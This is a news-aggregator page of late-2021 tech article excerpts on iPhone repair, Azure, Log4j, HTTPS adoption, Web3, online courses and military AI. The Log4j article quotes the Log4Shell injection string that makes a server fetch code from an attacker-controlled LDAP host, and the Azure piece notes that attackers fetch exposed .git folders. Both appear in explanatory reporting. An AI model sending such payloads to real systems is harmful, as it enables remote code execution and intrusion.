iOS 15.2 Makes it Easier to Replace the Screen on the iPhone 13 – iDrop News

It appears that iOS 15.2 packs in one more small but significant improvement that should improve the lives of do-it-yourselfers and independent repair shops.

Last month, well-known DIY repair site iFixit blew the whistle on an unfriendly new feature in the iPhone 13 lineup that would have made it far more difficult for small third-party repair providers to swap out a broken iPhone display.

The problem, iFixit pointed out, was that replacing the screen on any iPhone 13 model would break Face ID unless very specific and extremely complex steps were taken to also move a very small microchip over from the old display, and delicately microsolder it into the new one.

Since this is well beyond the skill set of most DIYers, and even many small repair shops, it basically threatened to block these kinds of repairs entirely.

To be clear, this wasn't just a problem with non-genuine displays, either. Even swapping displays between two identical, brand new iPhone 13 models would result in Face ID being disabled on both of them.

Like the Touch ID sensor on older iPhone models, Apple pairs, or serializes, the TrueDepth camera system with each specific iPhone to protect against potential tampering that could allow hackers to bypass the normal security protocols. However, it made no sense that the display should be serialized in this manner, since it's not connected to any of the components used by Face ID.

Even so, the display used in the iPhone 13 includes a small chip about the size of a Tic-Tac, and this is uniquely linked to the specific iPhone 13 device that it was originally installed on. Move that screen to another device, and the new iPhone will fail to recognize it, declaring it non-genuine and disabling Face ID in the process.

This isn't a problem for authorized Apple repair shops, as they have access to special tools that allow them to sync up the iPhone with a new display via Apple's cloud servers. Of course, these tools aren't available to independent repair shops unless they're willing to sign up for Apple's Independent Repair Provider (IRP) program.

However, many smaller shops consider the terms of that program far too onerous, since Apple requires them to submit to random inspections to look for prohibited repair parts, and customers have to sign special waivers acknowledging that they're not getting real Apple repairs.

Not long after iFixit broke the news, Apple promised that a fix would be coming in a future iOS update, and it looks like that's arrived with iOS 15.2.

While Apple made no mention of it in the iOS 15.2 release notes, iFixit has confirmed that the latest version fixes the Face ID Repair Trap on the iPhone 13. It's also upgraded its Repairability Score for the iPhone 13 to 6 out of 10, bringing it back in line with other recent iPhone models.

After iOS 15.2 landed, iFixit conducted a full parts-swap test, grabbing two iPhone 13 Pro Max devices and moving over not just the display, but also the battery and the camera system.

In doing so, iFixit discovered that even though Face ID will no longer be disabled when swapping a new screen over, Apple still provides the usual series of "Important" warnings telling users that they're not using genuine Apple parts.

To be fair, this shouldn't come as a big surprise, since Apple has been doing this with batteries for a few years now, and began flashing up the same warnings for the screen and camera with the iPhone 11 and iPhone 12, respectively.

iFixit also points out that there's an interesting discrepancy between the messages, however. Apple uses the phrase "Unable to determine" for the display and camera, and points the user to the Settings app for more information.

By comparison, the battery warning says "Unable to verify," and omits the section telling the user to "Go to Settings for more information," although it still includes a Settings button that takes the user to the battery health section of the Settings app.

It's probably not entirely a coincidence that iOS 15.2 also introduces a new Parts and Service History section in the Settings app, giving you a summary of which parts have been replaced, and whether they're genuine.

This section will only appear if you've had anything replaced on your iPhone; it doesn't show up if your device still has all of its original parts. It also only shows the status of parts that would normally generate a warning on a given model if they weren't genuine. For instance, Apple only started serializing the camera with last year's iPhone 12 models, so iOS 15.2 won't be able to tell you if an iPhone 11 or older model is using a non-genuine camera.

Continue reading here:
iOS 15.2 Makes it Easier to Replace the Screen on the iPhone 13 - iDrop News

Read More..

4-Year-Old Bug in Azure App Service Exposed Hundreds of Source Code Repositories – The Hacker News

A security flaw has been unearthed in Microsoft's Azure App Service that resulted in the exposure of source code of customer applications written in Java, Node, PHP, Python, and Ruby for at least four years since September 2017.

The vulnerability, codenamed "NotLegit," was reported to the tech giant by Wiz researchers on October 7, 2021, following which mitigations have been undertaken to fix the information disclosure bug in November. Microsoft said a "limited subset of customers" are at risk, adding "Customers who deployed code to App Service Linux via Local Git after files were already created in the application were the only impacted customers."

The Azure App Service (aka Azure Web Apps) is a cloud computing-based platform for building and hosting web applications. It allows users to deploy source code and artifacts to the service using a local Git repository, or via repositories hosted on GitHub and Bitbucket.

The insecure default behavior occurs when the Local Git method is used to deploy to Azure App Service, resulting in a scenario where the Git repository is created within a publicly accessible directory (home/site/wwwroot).

While Microsoft does add a "web.config" file to the .git folder which contains the state and history of the repository to restrict public access, the configuration files are only used with C# or ASP.NET applications that rely on Microsoft's own IIS web servers, leaving out apps coded in other programming languages like PHP, Ruby, Python, or Node that are deployed with different web servers like Apache, Nginx, and Flask.

"Basically, all a malicious actor had to do was to fetch the '/.git' directory from the target application, and retrieve its source code," Wiz researcher Shir Tamari said. "Malicious actors are continuously scanning the internet for exposed Git folders from which they can collect secrets and intellectual property. Besides the possibility that the source contains secrets like passwords and access tokens, leaked source code is often used for further sophisticated attacks."

"Finding vulnerabilities in software is much easier when the source code is available," Tamari added.

Here is the original post:
4-Year-Old Bug in Azure App Service Exposed Hundreds of Source Code Repositories - The Hacker News

Read More..

Log4j a catastrophic internet security flaw – Newspaper – DAWN.COM – DAWN.com

The information technology industry is facing a Covid-like situation in its security realm due to the Log4j vulnerability. The fear is that international hackers are already actively exploiting the breach in security.

The US Department of Homeland Security is raising a severe alarm, urging federal agencies to swiftly erase the issue since it's so easy to exploit, and telling those with public-facing networks to put up firewalls if they can't be sure. The impacted software is modest and sometimes undocumented.

Detected in a frequently used program called Log4j, the exploit lets internet-based attackers rapidly grab control of everything from industrial control systems to web servers and consumer devices. Simply detecting which computers utilise the utility is a challenge; it is sometimes concealed under layers of other applications.

Those readers who are IT specialists might be wondering what the Log4j vulnerability actually is. For them, the quick answer is that it is like SQL injection, a familiar vulnerability of the past. The code snippet (${jndi:ldap://[attacker_URL]}) might look familiar to software developers who have dealt with code injections.

Log4j is a Java library that is used for logging errors and other software activities. All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by an affected version of Log4j. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.

According to some estimations, up to 3 billion systems and 44 per cent of organisations could be potentially compromised by the Log4j issue. Millions of attempts by hackers have been logged on numerous networks. If anything, it's now achingly evident that Log4Shell will continue to wreak havoc across the internet for years to come.

While this is a high-severity vulnerability, it takes a very specific configuration to exploit. In case your organisation is affected, one quick fix could be to modify the Gradle or Maven configuration files to prevent the use of the affected version of the Log4j library while you look for a permanent fix. A comprehensive way to solve this issue is to upgrade to a corrected version of Log4j, above 2.16. The good news is that, just like Covid, we will come out of it sooner rather than later, as numerous teams of experts are working day and night to repair the issue.
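Before applying the build-file fix the author mentions, teams first need to know where vulnerable copies of the library live. The sketch below is an illustration rather than an official scanner: the scan root is hypothetical, and the version threshold simply mirrors the article's "above 2.16" advice.

```python
import re
from pathlib import Path

# Versions at or above this threshold are treated as fixed, mirroring the
# article's "above 2.16" advice; adjust it to whatever current guidance says.
FIXED = (2, 16, 0)


def jar_version(path: Path):
    """Extract (major, minor, patch) from a log4j-core jar filename, if any."""
    m = re.search(r"log4j-core-(\d+)\.(\d+)\.(\d+)\.jar$", path.name)
    return tuple(int(x) for x in m.groups()) if m else None


def find_vulnerable_jars(root: str):
    """Walk a directory tree and report log4j-core jars older than FIXED."""
    hits = []
    root_path = Path(root)
    if not root_path.is_dir():
        return hits
    for jar in root_path.rglob("log4j-core-*.jar"):
        version = jar_version(jar)
        if version is not None and version < FIXED:
            hits.append((str(jar), version))
    return hits


if __name__ == "__main__":
    for path, version in find_vulnerable_jars("/opt/apps"):  # hypothetical root
        print(f"Potentially affected: {path} ({'.'.join(map(str, version))})")
```

Filename scanning misses shaded or repackaged copies of the library, which is one reason the permanent fix remains the dependency upgrade itself.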

The writer is an IT professional, trained in the USA

Published in Dawn, The Business and Finance Weekly, December 27th, 2021

Read more from the original source:
Log4j a catastrophic internet security flaw - Newspaper - DAWN.COM - DAWN.com

Read More..

We Encrypted the Web: 2021 Year in Review – EFF

In 2010, EFF launched its campaign to encrypt the entire web: that is, to move all websites from non-secure HTTP to the more secure HTTPS protocol. Over 10 years later, 2021 has brought us even closer to achieving that goal. With various measurement sources reporting over 90% of web traffic encrypted, 2021 saw major browsers deploy key features to put HTTPS first. Thanks to Let's Encrypt and EFF's own Certbot, HTTPS deployment has become ubiquitous on the web.

For more than 10 years, EFF's HTTPS Everywhere browser extension has provided a much-needed service to users: encrypting their browser communications with websites and making sure they benefit from the protection of HTTPS wherever possible. Since we started offering HTTPS Everywhere, the battle to encrypt the web has made leaps and bounds: what was once a challenging technical argument is now a mainstream standard offered on most web pages. Now HTTPS is truly just about everywhere, thanks to the work of organizations like Let's Encrypt. We're proud of EFF's own Certbot tool, which is Let's Encrypt's software complement that helps web administrators automate HTTPS for free.

The goal of HTTPS Everywhere was always to become redundant. That would mean we'd achieved our larger goal: a world where HTTPS is so broadly available and accessible that users no longer need an extra browser extension to get it. Now that world is closer than ever, with mainstream browsers offering native support for an HTTPS-only mode.

In 2020, Firefox announced an HTTPS-only mode feature that all users can turn on, signaling that HTTPS adoption was substantial enough to implement such a feature. 2021 was the year the other major browsers followed suit, starting with Chrome introducing an HTTPS default for navigation when a user types in a URL without specifying insecure HTTP or secure HTTPS. Then in June, Microsoft's Edge announced an automatic HTTPS feature that users can opt into. Later in July, Chrome announced its HTTPS-first mode, which attempts to automatically upgrade all pages to HTTPS or display a warning if HTTPS isn't available. Given Chrome's dominant share of the browser market, this was a huge step forward in web security. Safari 15 also implemented an HTTPS-first mode in its browsers. However, it does not block insecure requests like Firefox, Chrome, and Edge do.
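In logic, an HTTPS-first mode boils down to trying the secure scheme before ever touching the insecure one. The sketch below only illustrates that upgrade-then-warn behaviour (and assumes the third-party requests package); it is not how Firefox, Chrome, Edge, or Safari actually implement the feature.

```python
import requests  # third-party package, assumed to be installed
from urllib.parse import urlparse, urlunparse


def https_first(url: str, timeout: float = 5.0) -> str:
    """Try the HTTPS version of a URL first; fall back to HTTP with a warning.

    Illustrative sketch of the upgrade-then-warn behaviour described above.
    """
    parts = urlparse(url if "://" in url else "http://" + url)
    secure = urlunparse(parts._replace(scheme="https"))
    try:
        requests.get(secure, timeout=timeout)
        return secure  # the upgrade succeeded, keep the secure URL
    except requests.RequestException:
        print(f"Warning: {secure} is unreachable, falling back to insecure HTTP")
        return urlunparse(parts._replace(scheme="http"))


if __name__ == "__main__":
    print(https_first("example.com"))
```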

With these features rolled out, HTTPS is truly everywhere, accomplishing the long-standing goal to encrypt the web.

SSL/TLS libraries are heavily used in everyday critical components of our security infrastructure, such as the transport of web traffic. These tools are primarily built in the C programming language, which has a long history of memory safety vulnerabilities. So the Internet Security Research Group has led the development of an alternative to libraries like OpenSSL written in the Rust language. Rust is a modern, memory-safe programming language, and the TLS library built in Rust has been named Rustls. Rustls has also been integrated for support in popular networking command-line utilities such as curl. With Rustls, important tools that use TLS can gain memory safety and make networks ever more secure and less vulnerable.

Since 2015, EFF's Certbot tool has helped millions of web servers deploy HTTPS by making the certificate process free and easy. This year we significantly updated the user experience of Certbot's command-line output for clarity. We also translated parts of the website into Farsi in response to user requests, and the Instructions Generator is now available in that language. We hope to add more languages in the future and make TLS deployment on websites even more accessible across the globe.

Even as we see positive movement by major browsers, from the HTTPS-by-default victories above to ending insecure FTP support and even Chrome adopting a Root Store program, we are also watching the potential dangers to these gains. Encrypting the net means sustaining the wins and fighting for tighter controls across all devices and major services.

HTTPS is ubiquitous on the web in 2021, and this victory is the result of over a decade of work by EFF, our partners, and the supporters who have believed in the dream of encrypting the web every step of the way.

Thank you for your support in fighting for a safer and more secure internet.

This article is part of our Year in Review series. Read other articles about the fight for digital rights in 2021.

Read the original post:
We Encrypted the Web: 2021 Year in Review - EFF

Read More..

The Global Secure Sockets Layer (SSL) Certification Market is expected to grow by $ 5.13 bn during 2021-2025, progressing at a CAGR of 21.30% during…

Global Secure Sockets Layer Certification Market 2021-2025

New York, Dec. 24, 2021 (GLOBE NEWSWIRE) -- Reportlinker.com announces the release of the report "Global Secure Sockets Layer (SSL) Certification Market 2021-2025" - https://www.reportlinker.com/p05251392/?utm_source=GNW

The analyst has been monitoring the secure sockets layer certification market and it is poised to grow by $5.13 bn during 2021-2025, progressing at a CAGR of 21.30% during the forecast period. Our report on the secure sockets layer certification market provides a holistic analysis, market size and forecast, trends, growth drivers, and challenges, as well as vendor analysis covering around 25 vendors. The report offers an up-to-date analysis regarding the current global market scenario, latest trends and drivers, and the overall market environment. The market is driven by the need to adhere to regulatory requirements and increasing awareness of end-users. In addition, the need to adhere to regulatory requirements is anticipated to boost the growth of the market as well. The secure sockets layer certification market analysis includes the product segment and geographic landscape.

The secure sockets layer certification market is segmented as below. By Product: Domain validation, Organizational validation, Extended validation.

By Geographical Landscape: North America, Europe, APAC, South America, MEA.

This study identifies the increasing number of data thefts as one of the prime reasons driving the secure sockets layer certification market growth during the next few years.

The analyst presents a detailed picture of the market by way of study, synthesis, and summation of data from multiple sources by an analysis of key parameters. Our report on the secure sockets layer certification market covers the following areas: secure sockets layer certification market sizing, secure sockets layer certification market forecast, and secure sockets layer certification market industry analysis.

This robust vendor analysis is designed to help clients improve their market position, and in line with this, this report provides a detailed analysis of several leading secure sockets layer certification market vendors that include Aruba Spa, Asseco Poland S.A., Comodo Security Solutions Inc., DigiCert Inc., Entrust Datacard Corp., GlobalSign Ltd., GoDaddy Inc., HID Global Corp., Internet Security Research Group, and NortonLifeLock Inc. Also, the secure sockets layer certification market analysis report includes information on upcoming trends and challenges that will influence market growth. This is to help companies strategize and leverage all forthcoming growth opportunities. The study was conducted using an objective combination of primary and secondary information including inputs from key participants in the industry. The report contains a comprehensive market and vendor landscape in addition to an analysis of the key vendors.

The analyst presents a detailed picture of the market by way of study, synthesis, and summation of data from multiple sources by an analysis of key parameters such as profit, pricing, competition, and promotions. It presents various market facets by identifying the key industry influencers. The data presented is comprehensive, reliable, and a result of extensive research, both primary and secondary. Technavio's market research reports provide a complete competitive landscape and an in-depth vendor selection methodology and analysis using qualitative and quantitative research to forecast accurate market growth.

Read the full report: https://www.reportlinker.com/p05251392/?utm_source=GNW

About Reportlinker

ReportLinker is an award-winning market research solution. Reportlinker finds and organizes the latest industry data so you get all the market research you need - instantly, in one place.


Here is the original post:
The Global Secure Sockets Layer (SSL) Certification Market is expected to grow by $ 5.13 bn during 2021-2025, progressing at a CAGR of 21.30% during...

Read More..

What is Web3, is it the new phase of the Internet and why are Elon Musk and Jack Dorsey against it? – Euronews

Web3 has become the latest buzzword to get tech and cryptocurrency enthusiasts talking. While some are excited at what is being dubbed as the next phase of the Internet, others, including Elon Musk and Jack Dorsey, have voiced their concerns over it.

But what is Web3 and can this decentralised vision of the Internet work?

Put simply, Web3 is an umbrella term for an online ecosystem that cuts out the big middlemen on the Internet. So, platforms on Web3 are not owned by central gatekeepers, and you wouldn't navigate the Internet through search engines such as Google.

It uses blockchain, the same system used by cryptocurrencies and non-fungible tokens (NFTs).

The first version of the world wide web was launched by Sir Tim Berners-Lee in 1989. Back then, the few people who had the knowledge could put information online in a decentralised way.

Web 2.0 came some 10 years later and started with the development of tools that were easy to use, allowing anyone to upload content online via the tech giants such as Google, Twitter and Facebook (now Meta).

But these free tools supplied by the tech companies, which allowed everyone to become a publisher, were also harvesting our personal data to be used for tailored advertisements and marketing campaigns.

In theory, Web3 will be a combination of the two earlier versions of the Internet but will take the power away from the tech giants and corporations and put it back into the people's hands.

And instead of exchanging our data to upload content online, users can become participants and shareholders by earning tokens on the blockchain system, which will allow you to have a say over a network.

"Web 2.0 is the transmission of information but Web3 is the transmission of values," said Pascal Gauthier, CEO of the crypto hardware wallet Ledger, one of France's unicorns.

"We can see that currently on the Internet, your experience becomes bad as soon as you have to take out your credit card," he told Euronews Next, adding, "Web3 basically fixes issues such as payments."

How does it work?

In the Web3 world, search engines, marketplaces and social networks will have no overriding overlord.

So you can control your own data and have a single personalised account where you could flit from your emails to online shopping and social media, creating a public record of your activity on the blockchain system in the process.

A blockchain is a secure database that is operated by users collectively and can be searched by anyone. People are also rewarded with tokens for participating.

It comes in the form of a shared ledger that uses cryptography to secure information. This ledger takes the form of a series of records or blocks that are each added onto the previous block in the chain, hence the name.

Each block contains a timestamp, data, and a hash. This is a unique identifier for all the contents of the block, sort of like a digital fingerprint.
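As a rough illustration of that structure (a toy sketch only, leaving out consensus, signatures, and everything else a real blockchain needs), each block can be modelled as a record whose hash covers its timestamp, its data, and a pointer to the previous block's hash:

```python
import hashlib
import json
import time


def block_hash(block: dict) -> str:
    """Hash every field except the block's own hash (its 'fingerprint')."""
    payload = {k: v for k, v in block.items() if k != "hash"}
    return hashlib.sha256(json.dumps(payload, sort_keys=True).encode()).hexdigest()


def make_block(data: str, previous_hash: str) -> dict:
    block = {"timestamp": time.time(), "data": data, "previous_hash": previous_hash}
    block["hash"] = block_hash(block)
    return block


def chain_is_valid(chain: list) -> bool:
    """Each block must hash correctly and point at the block before it."""
    for i, block in enumerate(chain):
        if block["hash"] != block_hash(block):
            return False
        if i > 0 and block["previous_hash"] != chain[i - 1]["hash"]:
            return False
    return True


if __name__ == "__main__":
    chain = [make_block("genesis", "0" * 64)]
    chain.append(make_block("alice pays bob 1 token", chain[-1]["hash"]))
    print(chain_is_valid(chain))   # True
    chain[0]["data"] = "tampered"  # any edit breaks the chain
    print(chain_is_valid(chain))   # False
```

Because each hash depends on the previous one, altering any historical block invalidates every block after it, which is what makes the shared ledger tamper-evident.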

The idea of a decentralised Internet has been in the works for the last decade with the explosion of cryptocurrencies and blockchain, and there are arguably some early Web3 applications that already exist. But we are not officially in the Web3 world.

Is Web3 too idealistic?

The idea of a decentralised internet may sound far-fetched but big tech companies are already betting big on it and even assembling Web3 teams.

But even if power is taken away from the tech giants, the people currently shaping Web3 are software developers and venture investors. Meanwhile, blockchain networks are not equally distributed and are in the hands of venture capitalists and early adopters.

This week, the former Twitter CEO Jack Dorsey suggested that Web3 is under the control of the venture capital industry, particularly the firm Andreessen Horowitz, an early Facebook backer and a Web3 advocate.

"You don't own Web3. The VCs and their LPs do. It will never escape their incentives. It's ultimately a centralized entity with a different label," Square's CEO tweeted.

On Thursday, Dorsey tweeted in response that he had been blocked on Twitter by Marc Andreessen, co-founder of Andreessen Horowitz.

Meanwhile, Tesla chief Elon Musk says Web3 is more of a marketing buzzword than reality.

"Im not suggesting web3 is real seems more marketing buzzword than reality right now just wondering what the future will be like in 10, 20 or 30 years. 2051 sounds crazy futuristic," he wrote on Twitter.

Musk also asked where it was, to the annoyance of Web3 devotees.

What are the challenges?

Experts have expressed concerns over how to regulate a decentralised internet, which would make it even more difficult to prevent cybercrime, hate speech and misinformation.

Web3 can also be hard to use but Gauthier says the challenge is not if people can access it easily but if they know how to manage their data securely.

"Anyone on the planet can access Bitcoin or Ethereum today, as long as you have an internet connection. So there are billions of human beings that can access Web3 systems, while the same human beings cannot necessarily access the banking system," he said.

To understand how Web3 works, there are some mistakes you should be aware of and you have to pay attention to your safety.

Before, in the financial world, security was provided by your bank. All of a sudden, now, you have to do it yourself since you own the privileges and you can manage your money online. So that means that there is a whole education and understanding part of the security issues that are important.

Building the technology to make Web3 fully decentralised, which has never been done before, is also one of the challenges.

"Creating decentralised tools is not easy. Centralised systems are easier to build but less transparent," said Úrsula O'Kuinghttons, director of public relations of the blockchain infrastructure company Parity Technologies, who also works with the Web3 Foundation.

"Some blockchain hybrids are a combination of centralised and decentralised systems, but creating 100 per cent decentralised tools is the hardest and the longest part. But this is what Web3 is truly about," she told Euronews Next.

Go here to see the original:
What is Web3, is it the new phase of the Internet and why are Elon Musk and Jack Dorsey against it? - Euronews

Read More..

Covid, Online Professional Programmes; Here Are Top Trending Courses In 2021 – NDTV

2021 year-ender: Trending courses during the year


While the year 2021 saw disruptions in most academic courses due to the ongoing Covid pandemic, several online courses provided by Study Webs of Active Learning for Young Aspiring Minds (SWAYAM), the Indian Institutes of Technology (IITs) and other institutions and platforms were trending this year. With colleges and universities holding classes remotely, students have enrolled in online courses for their easy accessibility and easy course format.

Given the developments in the last five years and unprecedented Covid times, as per International Career and College Counseling (IC3) Institute Academic Head, Amrita Ghulati, there has been a definite surge in courses related to Artificial Intelligence, Machine learning, Cyber security, Data Science, Digital Marketing, Business Analytics, and Health care.

"Particularly interesting is the growth in courses in entrepreneurship and innovation across different levels of education, also being embedded in some well-established, traditional programs of study. Another noticeable trend is the bent towards more broad-based, inter- and multidisciplinary courses: T-shaped education with breadth across disciplines coupled with depth or specialization in one or two domains," the IC3 Institute Academic Head added.

Also, the second wave of Covid, which hit the country at the beginning of the year, led medical professionals and healthcare executives to delve into courses to learn what the virus is all about and how to approach patients who are affected.

With the year coming to an end, let us look at the emerging courses in 2021.

The Academic Writing course is one of the emerging SWAYAM certificate courses, aimed at bridging the gap by providing knowledge for effective and result-oriented academic writing. It is a foundation-level course, and the learning depends on how a learner does their research work in a specific area. Students can avail of the Academic Writing course on SWAYAM. The course duration is 15 weeks, and the course is in line with the higher education regulator University Grants Commission's pre-PhD course work.

With the increase in the penetration of the internet and online activity, the scope of digital marketing has also increased. Digital marketing includes topics like content marketing, search engine optimization (SEO), social media and marketing analytics.

The course in Peace and Conflict Management is one of the Swayam online courses that seek to teach the concept of peace and the role of peace in human development. The course in Peace and Conflict Management also seeks to teach learners theories and types of conflict, methods of conflict management, and contemporary initiatives of peace.

The Blockchain courses are designed to help technical and non-technical learners with key concepts. Kerala Blockchain Academy, under the state-run Digital University Kerala, offered two free fundamental programs in Blockchain technology.

The Robotics course was also trending in 2021. The course in Robotics is one of the SWAYAM free online courses offered by the Indian Institute of Science (IISc) Bangalore and is designed for PhD and Masters students in Electrical/Mechanical Engineering and Computer Science. Students belonging to all disciplines of engineering, researchers and practising engineers can take courses in Robotics on SWAYAM. The Robotics course on the SWAYAM platform is an eight-week course.

The course on Covid-19 Contact Tracing is for physicians, nurses, and other healthcare professionals. This course helps learners take a unified and evidence-based approach to saving the lives of patients affected by Covid.

With students and professionals working remotely during 2021, many learners enrolled for courses on languages. A study published in the journal Scientific Reports also found that learning foreign languages enhances the brain's elasticity and its ability to code information.

Data Science courses have been much hyped in 2021. Courses in Data Science help a student analyse data or information from different sources and gain maximum insight. Data Science courses have been provided by the Indian Institutes of Technology (IITs), including those in Delhi and Madras.

Introduced in 2020, IIT Madras' BSc in Programming and Data Science is the first-ever online degree programme offered by an IIT.

"Digital transformation has truly led the way in 2021, and full-stack software and product engineering, cloud computing, data science, and other technologies have been the key enablers of actioning this transformation," Abhishek Arora, EVP and Business Head, Skills and Careers Business, NIIT Ltd, said.

Adding that NIIT is in the process of developing free content for its learners and prospective learners and aims to deep-skill them so as to make them future ready, Mr Arora further added that: "With industry 4.0, there is a general tilt towards courses which focus on automation, Internet of Things, Artificial Intelligence amongst others and a learner equipped with these in-demand skills tends to have an edge amongst recruiters. Apart from enabling better job opportunities, they offer ample other advantages too such as edge over competition, equipped with knowledge on real-life projects etc."

Read this article:
Covid, Online Professional Programmes; Here Are Top Trending Courses In 2021 - NDTV

Read More..

It’s both AI technology and ethics that will enable JADC2 – Breaking Defense

Artificial intelligence graphic courtesy of Northrop Grumman.

Questions that loom large for the wider application of artificial intelligence (AI) in Defense Department operations often center on trust. How does the operator know if the AI is wrong, that it made a mistake, that it didn't behave as intended?

Answers to questions like that come from a technical discipline known as Responsible AI (RAI). It's the subject of a report issued by the Defense Innovation Unit (DIU) in mid-November called Responsible AI Guidelines in Practice, which addresses a requirement in the FY21 National Defense Authorization Act (NDAA) to ensure that the DoD has the ability, requisite resourcing, and sufficient expertise to ensure that any artificial intelligence technology is ethically and reasonably developed.

DIU's RAI guidelines provide a framework for AI companies, DoD stakeholders and program managers that can help to ensure that AI programs are built with the principles of fairness, accountability, and transparency at each step in the development cycle of an AI system, according to Jared Dunnmon, technical director of the artificial intelligence/machine learning portfolio at DIU.

This framework is designed to achieve four goals, said Dunnmon:

Trust in the AI is foremost

Just as Isaac Asimov's Three Laws of Robotics describe ethical behavior for robots, the DIU's guidelines offer five ethical principles for the development and use of artificial intelligence.

It's that fifth principle, "governable," that addresses the questions asked at the top about letting the operator know when the AI is wrong. Operators need to establish trust in the AI systems or they simply won't be used. That's not an option for something as complex as the Joint All Domain Command and Control concept of operations.

Dr. Amanda Muller, Consulting (AI) Systems Engineer and Technical Fellow, who is the Responsible AI Lead for Northrop Grumman.

"Governable AI systems allow for graceful termination and human intervention when algorithms do not behave as intended," said Dr. Amanda Muller, Consulting AI Systems Engineer and Technical Fellow, who is the Responsible AI Lead for Northrop Grumman, which is one of the few companies with such a position. "At that point, the human operator can either take over or make adjustments to the inputs, to the algorithm, or whatever needs to be done. But the human always maintains the ability to govern that AI algorithm."

Northrop Grumman's adoption of these RAI principles builds justified confidence in the AI systems being created because the human can understand and interpret what the AI is doing, determine whether it's operating correctly through verification and validation, and take action if it is not.
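As an illustration of what "governable" can mean in code (a minimal sketch using assumed names and thresholds, not Northrop Grumman's or the DoD's actual design), an inference wrapper can withhold a model's recommendation and hand control back to the operator whenever the output is low-confidence or outside the set of authorized actions:

```python
from dataclasses import dataclass
from typing import Callable, Optional, Tuple


@dataclass
class Decision:
    action: Optional[str]  # the model's recommendation, or None if withheld
    needs_operator: bool   # True when a human must review or take over


def governed_inference(
    model: Callable[[dict], Tuple[str, float]],
    observation: dict,
    min_confidence: float = 0.9,
    allowed_actions: frozenset = frozenset({"track", "hold", "report"}),
) -> Decision:
    """Run the model, but defer to a human when the output is low-confidence
    or outside the set of actions the system is authorized to take."""
    action, confidence = model(observation)
    if action not in allowed_actions or confidence < min_confidence:
        return Decision(action=None, needs_operator=True)  # graceful hand-off
    return Decision(action=action, needs_operator=False)


if __name__ == "__main__":
    # A stand-in model for demonstration purposes only.
    fake_model = lambda obs: ("track", 0.62)
    print(governed_inference(fake_model, {"sensor": "radar"}))
```

The point of the wrapper is the hand-off path: the human retains an explicit, always-available route to intervene or take over, which is the behavior the governable principle describes.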

The importance of doing so is clear for the future of AI in the military. "If AI systems do not work as designed or are unpredictable, leaders will not adopt them, operators will not use them, Congress will not fund them, and the American people will not support them," states the Final Report from the National Security Commission on Artificial Intelligence (NSCAI). This commission was a temporary, independent, federal entity created by Congress in the National Defense Authorization Act for Fiscal Year 2019. The commission was led by former Google CEO Eric Schmidt and former Deputy Secretary of Defense Robert Work, and delivered its 756-page Final Report in March 2021, disbanding in October.

"The power of AI is its ability to learn and adapt to changing situations," said Muller. "The battlefield is a dynamic environment and the side that adapts fastest gains the advantage. Like with all systems, though, AI is vulnerable to attack and failure. To truly harness the power of AI technology, developers must align with the ethical principles adopted by the DoD."

The complexity of all-domain operations will demand AI

The DoD's pledge to develop and implement only Responsible Artificial Intelligence will underpin the development of systems for JADC2. An OODA (Observe, Orient, Decide, Act) loop stretching from space to air and ground, and to sea and cyber, will only be possible through the ability of an AI system to control the JADC2 infrastructure.

Vern Boyle, Vice President of Advanced Processing Solutions for Northrop Grumman's Networked Information Solutions division.

"The AI could perceive and reason on the best ways to move information across different platforms, nodes, and decision makers," explained Vern Boyle, Vice President of Advanced Processing Solutions for Northrop Grumman's Networked Information Solutions division. "And it could optimize the movement of that information and the configuration of the network because it'll be very complex."

"We'll be operating in contested environments where it will be difficult for a human to react and understand how to keep the network and the comm links functioning. The use of AI to control the communication and networking infrastructure is going to be one big application area."

At the same time, RAI will serve as a counterweight to America's Great Power competitors, China and Russia, who certainly won't engage in ethical AI as they push for power. As part of its strategic plan, China has declared it will be the global leader in AI by 2030, and its investments in dual-use technologies like advanced processing, cyber security, and AI are threats to U.S. technical and cognitive dominance.

"The key difference is that China is applying AI technologies broadly throughout the country," said Boyle. "They are using AI for surveillance and tracking their citizens, students, and visitors. They use AI to monitor online behaviors, social interactions and biometrics."

China has no concern about privacy rights or ethical application of the data that AI is able to gather and share. All data is collected and used by both industry and the Chinese government to advance their goal of global, technical dominance by 2030.

Fundamental to the U.S. response to China's actions is assuring that the Defense Department's use of AI reflects democratic values, according to Boyle.

"It is critical that we move rapidly to set the global standard for responsible and ethical AI use, and to stay ahead of China and Russia's advances toward the lowest common denominator. The U.S., our ally partners, and all democratic-minded nations must work together to lead the development of global standards around AI and talent development."

Northrop Grumman systems to close the connectivity/networking gap

Doing so will help to close one of the most significant capability gaps facing armed forces right now, which is basic connectivity and networking. The platforms and sensors needed to support JADC2 (satellites, unmanned air and ground systems, and guided missile destroyers, to name a few) aren't necessarily able to connect and move information effectively because of legacy communications and networking systems.

That reality will dampen the DoD's ambitions for AI and machine learning for tactical operations.

"It's both a gap and a challenge," observed Boyle. "Let's assume, though, that everyone's connected. Now there's an information problem. Not everybody shares their information. It's not described in a standard way. Having the ability to understand and reason on information presumes that you're able to understand it. Those capabilities aren't necessarily mature yet either."

"There are also challenges with respect to multi-level security and the ability to share and distribute information at different classification levels. That adds a level of complexity that's not typically present in the commercial sector."

The severity of this issue and the need to solve it in the name of all-domain operations is driving Northrop Grumman to prioritize the successful application of AI to communications and networking.

The company has numerous capabilities deployed now on important platforms such as Global Hawk and is working with customers to leverage gateway systems in service now for data relay, while developing new capabilities to address gaps in communications and networking.

AI graphic courtesy of Northrop Grumman.

Northrop Grumman's portfolio already contains enabling technologies needed to connect joint forces, including advanced networking, AI/ML, space, command and control systems, autonomous systems powered by collaborative autonomy, and advanced resiliency features needed to protect against emerging threats. And it is developing AI that acts as the connective tissue for military platforms, sensors, and systems to communicate with one another, enabling them to pass information and data using secure, open systems, similar to how we use the Internet and 5G in our day-to-day lives.

"The DoD has stated that it must have an AI-enabled force by 2025 because speed will be the differentiator in future battles," said Boyle. "That means speed to understand the battle space; speed to determine the best course of action to take in a very complex and dynamic battle space; and speed to be able to take appropriate actions. Together, they will let the DoD more quickly execute the OODA Loop (Observe, Orient, Decide, Act)."

AI and advanced, specialized processing at the tactical edge will provide a strategic information advantage. AI and edge computing are the core enabling technologies for JADC2.

See more here:
It's both AI technology and ethics that will enable JADC2 - Breaking Defense

Read More..

How to tackle cyber hacks on crypto exchanges – Legal Cheek

LSE law graduate Hui Ting Tan considers the case for reform

